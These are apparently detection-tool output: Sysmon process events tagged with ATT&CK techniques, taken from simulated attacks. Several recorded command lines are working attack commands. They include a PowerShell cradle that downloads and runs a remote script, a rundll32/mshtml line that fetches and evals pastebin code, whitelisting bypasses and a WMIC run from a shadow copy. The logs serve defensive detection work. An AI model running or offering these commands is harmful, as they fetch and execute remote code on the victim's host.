powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-6623-5D3F-0000-001011F68700
5816
C:\Windows\System32\cmd.exe
cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1557680511.00795,2019-05-12T21:01:51.007950+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe ),1,"
1
5
4
1
0
0x8000000000000000
16497
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 17:01:50.781
365ABB72-517E-5CD8-0000-001024D61700
2952
C:\Windows\System32\pcalua.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Program Compatibility Assistant
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-4FB5-5CD8-0000-0020F2350100
0x135f2
1
Medium
SHA1=ABB6319976D9702E0C80978D51C0AEE88A33D201,MD5=D652BA887500816431566B524292ECCB,SHA256=65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE,IMPHASH=256CD8CEDFD4FCB3BC9DB32E27E5923A
365ABB72-516B-5CD8-0000-001087E41600
3788
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1,"
1
5
4
1
0
0x8000000000000000
4912
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:23.380
747F3D96-6623-5D3F-0000-0010BC068800
3000
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-6623-5D3F-0000-001011F68700
5816
C:\Windows\System32\cmd.exe
cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564126781.211276,2019-07-26T11:39:41.211276+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} )",1,"
1
5
4
1
0
0x8000000000000000
4353
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-26 07:39:14.853
747F3D96-AE22-5D3A-0000-001004D84E00
5548
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}
C:\Users\IEUser\Desktop\
MSEDGEWIN10\IEUser
747F3D96-ABD5-5D3A-0000-0020EB990F00
0xf99eb
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-AE22-5D3A-0000-001096B24E00
1504
C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1074] Data Staged - Process,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1,"
1
5
4
1
0
0x8000000000000000
4912
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:23.380
747F3D96-6623-5D3F-0000-0010BC068800
3000
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-6623-5D3F-0000-001011F68700
5816
C:\Windows\System32\cmd.exe
cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta)",1,"
1
5
4
1
0
0x8000000000000000
16395
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:38:00.523
365ABB72-21B8-5CD8-0000-0010BADE2600
3856
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"
1
5
4
1
0
0x8000000000000000
16395
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:38:00.523
365ABB72-21B8-5CD8-0000-0010BADE2600
3856
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"
1
5
4
1
0
0x8000000000000000
16395
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 13:38:00.523
365ABB72-21B8-5CD8-0000-0010BADE2600
3856
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-1596-5CD8-0000-0020103A0100
0x13a10
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2006-5CD8-0000-0010E0912300
2936
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553028075.144276,2019-03-20T00:41:15.144276+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
1966251
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:36:04.206
365ABB72-52B4-5C91-0000-0010355B0100
1628
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-528D-5C91-0000-0020E7030000
0x3e7
0
System
MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-528D-5C91-0000-001062560000
484
C:\Windows\System32\services.exe
C:\Windows\system32\services.exe
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe")",1,"
1
5
4
1
0
0x8000000000000000
417079
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 11:43:36.303
747F3D96-D8E8-5F8A-0000-00102CEF7200
840
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe"
C:\Users\IEUser\AppData\Roaming\
MSEDGEWIN10\IEUser
747F3D96-CA8D-5F8A-0000-0020D1090A00
0xa09d1
1
High
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-D8E5-5F8A-0000-0010E1BC7200
2920
C:\Users\IEUser\AppData\Roaming\WINWORD.exe
C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab})",1,"
1
5
4
1
0
0x8000000000000000
10674
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-14 12:17:14.447
747F3D96-FBCA-5D53-0000-0010B8664100
2476
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-F419-5D53-0000-002026910200
0x29126
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-F41E-5D53-0000-001067C80300
4824
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1,"
1
5
4
1
0
0x8000000000000000
417079
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 11:43:36.303
747F3D96-D8E8-5F8A-0000-00102CEF7200
840
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe"
C:\Users\IEUser\AppData\Roaming\
MSEDGEWIN10\IEUser
747F3D96-CA8D-5F8A-0000-0020D1090A00
0xa09d1
1
High
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-D8E5-5F8A-0000-0010E1BC7200
2920
C:\Users\IEUser\AppData\Roaming\WINWORD.exe
C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"
1
5
4
1
0
0x8000000000000000
10674
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-14 12:17:14.447
747F3D96-FBCA-5D53-0000-0010B8664100
2476
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-F419-5D53-0000-002026910200
0x29126
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-F41E-5D53-0000-001067C80300
4824
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.233522,2019-05-27T05:29:19.233522+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName ),1,"
1
5
4
1
0
0x8000000000000000
5952
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.183
365ABB72-3D6F-5CEB-0000-001026B9FF00
1036
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
1
5
4
1
0
0x8000000000000000
6188
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:54.428
365ABB72-FE76-5CEB-0000-0010546E0C00
2356
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1,"
1
5
4
1
0
0x8000000000000000
417079
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 11:43:36.303
747F3D96-D8E8-5F8A-0000-00102CEF7200
840
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\System32\rundll32.exe"
C:\Users\IEUser\AppData\Roaming\
MSEDGEWIN10\IEUser
747F3D96-CA8D-5F8A-0000-0020D1090A00
0xa09d1
1
High
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-D8E5-5F8A-0000-0010E1BC7200
2920
C:\Users\IEUser\AppData\Roaming\WINWORD.exe
C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"
1
5
4
1
0
0x8000000000000000
10674
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-14 12:17:14.447
747F3D96-FBCA-5D53-0000-0010B8664100
2476
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-F419-5D53-0000-002026910200
0x29126
1
Medium
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-F41E-5D53-0000-001067C80300
4824
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557680510.781015,2019-05-12T21:01:50.781015+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
16496
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 17:01:31.380
365ABB72-516B-5CD8-0000-001087E41600
3788
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-4FB5-5CD8-0000-0020F2350100
0x135f2
1
Medium
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-502E-5CD8-0000-00102A330700
3192
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
1
5
4
1
0
0x8000000000000000
6188
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:54.428
365ABB72-FE76-5CEB-0000-0010546E0C00
2356
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1223] Compiled HTML File,1564126754.409237,2019-07-26T11:39:14.409237+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\hh.exe ),1,"
1
5
4
1
0
0x8000000000000000
4348
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-26 07:39:14.345
747F3D96-AE22-5D3A-0000-001096B24E00
1504
C:\Windows\hh.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft® HTML Help Executable
HTML Help
Microsoft Corporation
"C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm
C:\Users\IEUser\Desktop\
MSEDGEWIN10\IEUser
747F3D96-ABD5-5D3A-0000-0020EB990F00
0xf99eb
1
Medium
SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C
747F3D96-ABD7-5D3A-0000-001012661000
4940
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243534
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:24.993
747F3D96-9F68-5E75-0000-0010B9662000
7420
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
